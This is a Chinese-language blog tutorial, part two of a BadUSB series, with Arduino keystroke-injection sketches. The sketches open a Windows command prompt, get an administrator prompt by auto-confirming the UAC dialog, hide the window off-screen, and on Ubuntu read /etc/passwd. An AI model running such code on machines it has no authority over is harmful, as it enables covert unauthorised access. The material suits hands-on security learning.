从零开始学badusb(2)--badusb调用命令行

最新推荐文章于 2024-06-30 15:21:39 发布
最新推荐文章于 2024-06-30 15:21:39 发布
阅读量1.9k 收藏 16
点赞数 4
分类专栏: 从零开始学badusb 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/azraelxuemo/article/details/106410110
版权

上一节初步接触了badusb,这节我们学习一下怎么调用cmd

首先是windows下面
首先是简易版的

#include  <Keyboard.h>
 void setup() 
{ 
 Keyboard.begin();
  delay(1000); 
 Keyboard.press(KEY_LEFT_GUI); 
 delay(500); 
Keyboard.print("r");
delay(500);
Keyboard.release(KEY_LEFT_GUI); 
delay(500);
Keyboard.println("cmd");
 Keyboard.end(); 
 } 
 void loop() 
 {}

这个就是大家很熟悉的win+r cmd+回车,一位内我们用的是println,所以自带回车
但很多时候我们需要的是管理员权限的cmd
那么就需要用到下面这个

#include  <Keyboard.h>
 void setup() 
{ 
 Keyboard.begin();
  delay(1000); 
 Keyboard.press(KEY_LEFT_GUI); 
 delay(500); 
Keyboard.release(KEY_LEFT_GUI); 
delay(500);
Keyboard.press(KEY_CAPS_LOCK);
delay(500);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
 Keyboard.print("cmd.exe"); 
 delay(500);
 Keyboard.press(KEY_LEFT_CTRL );
Keyboard.press(  KEY_LEFT_SHIFT);
Keyboard.press(KEY_RETURN); 
delay(500); 
 Keyboard.release(KEY_LEFT_CTRL); 
 Keyboard.release(KEY_LEFT_SHIFT); 
 Keyboard.release(KEY_RETURN); 
delay(500); 
Keyboard.press( KEY_LEFT_ALT    );
Keyboard.press('y'); 
delay(500); 
 Keyboard.release(KEY_LEFT_ALT    ); 
 Keyboard.release('y'); 
delay(500); 
 Keyboard.end(); 
 } 
 void loop() 
 {}

首先按一下win,然后切换大小写防止中文输入
然后就会在开始栏查询cmd.exe就是我们的命令提示符
ctrl+shift+return就会弹出来一个是否使用管理员身份来运行cmd.exe
再alt+y表示确认,就可以获得一个管理员身份的命令提示符

接下来就是一个隐藏我们cmd的过程,其实也没有那么神器,只是缩小隐藏起来罢了
这个跟之前相比,平常我们运行的时候就只是cmd
CMD /q /d /f:off /v:on /k MODE con: cols=30 lines=6
这句话的理解
/q 关闭回显虽然我也不太理解关闭回显有什么效果,但是网上解释就是不显示?不太明白
/d 禁止从注册表执行 AutoRun 命令
/F:OFF 禁用文件和目录名完成字符
/V:ON 使用 ! 作为分隔符启用延迟的环境变量
MODE con: cols=30 lines=6调整行数和列数
为什么需要这些参数其实我目前也不太理解,不过慢慢看
alt+"+m就是右键点击cmd然后选择m对应的是移动
然后左键移动一会就可以看见命令行跑到窗口外面去了…
有点傻fufu的

#include<Keyboard.h>
void setup() {
  Keyboard.begin();
  delay(3000);
  Keyboard.press(KEY_LEFT_GUI);
  delay(200); 
  Keyboard.print('r');
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(1000); 
  Keyboard.println("CMD  /q /d /f:off /v:on /k MODE con: cols=30 lines=6");
  delay(1000);
  Keyboard.press(KEY_LEFT_ALT);
  delay(200); 
  Keyboard.press(' ');
  delay(200); 
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.release(' ');
  delay(200);
  Keyboard.print("m");
  Keyboard.press(KEY_LEFT_ARROW);
  delay(3000);
  Keyboard.release(KEY_LEFT_ARROW);
    Keyboard.println();
  Keyboard.end();
}

void loop() {
}

如果有大佬可以解释一下那些参数的意义的话也非常感谢科普

然后是一个基础的ubantu下调用终端的命令
ubantu下按住start键是开始查找的功能
输入terminal回车进入命令行
pwd显示当前路径
/etc/passwd显示着系统的权限分配
id 命令可以显示真实有效的用户 ID(UID) 和组 ID(GID)。UID 是对一个用户的单一身份标识。组 ID(GID)则对应多个UID

#include<Keyboard.h>
void setup() {
 Keyboard.begin();
  delay(3000);//延时
  Keyboard.press(KEY_LEFT_GUI);
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  delay(500);
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(200); 
  Keyboard.print("terminal");
  delay(3000);
   Keyboard.println();
     delay(3000);
   Keyboard.println("PWD");
  delay(1000);
  Keyboard.println("ID");
  delay(1000);
  Keyboard.println("CAT /ETC/PASSWD");
  delay(1000);
  Keyboard.end();
}

void loop() {
}

注意调整delay信息,不然可能出现命令未有效执行

azraelxuemo
关注
专栏目录
从零开始USB(二十八、usb鼠标驱动驱动实例分析[3]传输)
To_run_away的博客
03-19 3402
我们分析的这个usb鼠标是一个输入类型的中断传输。 既然是输入类型,必然要做好接收。 而一个端点中,一次事务中,传输的的最大字节数即量是在端点描述符中定义的。 /* USB_DT_ENDPOINT: Endpoint descriptor */ struct usb_endpoint_descriptor { __u8 bLength; __u8 bDescriptorTyp...
疯狂的极客--制作BadUSB
Peter_FHC的博客
05-30 936
文章目录设备软件编写代码(重点) 设备 1、 能够制作badusb的几种常见载体有:Arduino Leonardo、Phison、Teensy、Attiny85、PS2303(芯片)、RUBBER DUCKY等。从专业程度和易用性来讲,RUBBER DUCKY最优(Hak5官方提供了许多现成的按键脚本和payload),但价格也最贵。 2、 一台计算机 软件 下载Arduino开发者工具——Arduino IDE (用来向leonardo烧录程序的软件) 这里是Arduino IDE下载地址:http
BadUSB
weixin_30505751的博客
01-06 551
https://ducktoolkit.com/ https://shop.hak5.org/collections/bfcm2018-top/products/usb-rubber-ducky-deluxe https://github.com/hak5darren/USB-Rubber-Ducky https://www.freebuf.com/news/159942.html h...
badusb和openwrt
mcc的博客
05-18 744
badusb和openwrt 1.badusb 首先想说明一下的是这两个技术都是开源的,badusb几年前就已经发布过了,现在依然没有没有足够好的解决方案。说的通俗一点其实就是一个单片机系统,有点类似于鼠标等外接设备。看过相关的payload,其实就是模拟相关的键盘敲击,自动执行相关的cmd命令,从而实现对电脑的自动化攻击。下面以一个简单的payload进行讲解。 # Arduino——leo...
badusb_badusb_
09-29
badusb资料,需要自行打包带走
新型USB病毒BadUSB 即使U盘被格式化也无法根除
weixin_30655219的博客
08-02 226
这种病毒并不存在于USB设备中的存储文件中,而是根植于USB设备的固件里。这意味着,即使用户对U盘进行全面的格式化清理,仍不能“杀死”它。 转载于:https://www.cnblogs.com/baiduligang/p/4247144.html...
红队社工之BadUSB
博客地址 www.sec0nd.top
08-19 1521
BadUSB最早是在2014年的黑帽大会上研究人员JakobLell和Karsten Nohl提出并展示的。不同于老式的U盘病毒,它利用了USB协议中的一个漏洞,通过模拟键盘、鼠标、网卡等从而让目标电脑执行恶意代码,达到控住主机或者窃取敏感信息等目的。由于恶意代码位于U盘中的固件中,所以杀软无法访问和查杀U盘固件区域,但是如果恶意代码落盘或者恶意行为可以被监控或拦截。
BadUSB制作教程
weixin_40485904的博客
02-04 1849
BadUSB制作教程BadUSB的优点制作BadUSB的几种板子那么来做一个BadUSB怎么样? 和大多数人一样,最初见到BadUSB是在美剧《黑客军团》中,是fsociety组织常用的工具之一,无论是向服务器下载木马控制被害者主机,还是达琳在停车场帅气的扔出大量USB钓鱼,BadUSB都是功不可没的物理武器之一。 剧情中使用Hak5的USB rubber ducky控制目标主机 达琳在停车场扔BadUSB钓鱼 BadUSB的优点 在USB攻击领域,很多年前常用的是老式USB病毒autorun.inf,
Linux Kernel入门到精通系列讲解(RV-Kernel 篇) 5.3 从零移植 busybox,基于RISC-V
DSMGUOGUO的博客
06-10 299
上一章节我们已经成功启动了`Ubuntu`,但是由于`Ubuntu`占用系统空间过大,所以我转向占用较小的`busybox`,预计就占用`30M`左右。开始移植busybox,基于riscv64
运维知识点-linux操作系统-linux命令行-BashShell
aming小老弟
11-17 532
Yum(全称为 Yellow dog Updater, Modified)是一个在Fedora和RedHat以及CentOS中的Shell前端软件包管理器。基于RPM包管理,能够从指定的1、显示已经安装的软件包2、查找可以安装的软件包 (以 tomcat 为例)3、安装软件包 (以 tomcat 为例)4、卸载软件包 (以 tomcat 为例)5、列出软件包的依赖 (以 tomcat 为例)6、-y 自动应答yes我们可以用 -y 来应答所有的 yes , 比如我们安装 tomcat 的时候,
bad usb编译器
08-08
bad usb的编译器,欢迎下载。 Digispark Digispark是一个基于ATTINY85微控制器的开发板,体积小且价钱便宜,功能方面则没有Arduino般强大。代码与Arduino大同小異,也是使用Arduino IDE开发。 Digispark是Digistump LLC (digistump.com)版权所有,请使用者仔细阅读Digispark使用协议和版权声明 Digispark的特别之处是使用了USB与电脑沟通,省了USB至串口转换器。为此,Digispark必须占用2KB的快闪记忆体(Flash Memory)以便用来安装Bootloader。 Digispark的功能 打开Examples,大概知道Digispark的功能到达什么程度了。麻雀虽小,五脏俱全。
badusb代码.zip
07-25
分享一款badusb的代码,测试过还是可以正常使用。希望帮到有需要的小伙伴。
BADUSB代码及服务器地址.txt
07-21
BADUSB代码及服务器地址,主要用于arduino配置及BADUSB制作
【OpenHarmony4.1 之 U-Boot 2024.07源码深度解析】006 - Makefile 编译脚本 逐行深度解析
|~~~热爱生活、努力学习的小伙汁~~~|
06-15 479
【OpenHarmony4.1 之 U-Boot 2024.07源码深度解析】006 - Makefile 编译脚本 逐行深度解析
【OpenHarmony4.1 之 U-Boot 2024.07源码深度解析】011 - arch\arm\cpu\armv8\start.S 汇编源码逐行详解
最新发布
|~~~热爱生活、努力学习的小伙汁~~~|
06-30 472
【OpenHarmony4.1 之 U-Boot 2024.07源码深度解析】011 - arch\arm\cpu\armv8\start.S 汇编源码逐行详解
BadUsb制作
qq_34341458的博客
03-09 8273
型号: Digispark kickstarter 微型USB开发板 ATTINY58 就是下面这种 x宝有卖9元左右。 一. 准备: attiny驱动下载:https://www.arduino.cc/en/Main/Software?setlang=cn Arduino IDE:https://www.arduino.cc/en/software 免杀工具(自选):https://github.com/danielbohannon/Invoke-Obfuscation CobaltStrike且有
BadUSB制作教程_BadUSB简单示例(初)_程序编写工具
Jason Xu 的博客
04-10 5991
说明 本文章仅供习交流,请勿用于非法用途 我用的是CJMCU-Beetle arduino Leonardo USB ATMEGA32U4 Mini Size Development Board 官网购买地址https://www.thanksbuyer.com/cjmcu-beetle-arduino-leonardo-usb-atmega32u4-mini-size-development-board-35975 软件-Arduino Kali下自带 Windows下 官网下载地址 https://
IOT黑客入门篇之初探Badusb
网安君的博客
11-14 2800
BadUSB是一种使用带有恶意软件编程的USB设备的计算机安全攻击。例如,USB 闪存驱动器可以包含可编程的Intel 8051微控制器,该微控制器可以重新编程,将USB闪存驱动器变成恶意设备。BadUSB 攻击是在 2014 年由Karsten Nohl、Sascha Krißler和Jakob Lell在一次Black Hat演讲中首次披露的。演讲两个月后,其他研究人员发布了可用于利用该漏洞的代码。2017年,USG加密狗1.0版本发布,其作用类似于硬件防火墙,旨在防止BadUSB风格的攻击。
疯狂的极客--初识BadUSB
Peter_FHC的博客
05-27 2646
BadUSB是一种使用带有恶意软件编程的USB设备的计算机安全攻击,主流有四种工具,本文便对其做简单介绍。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值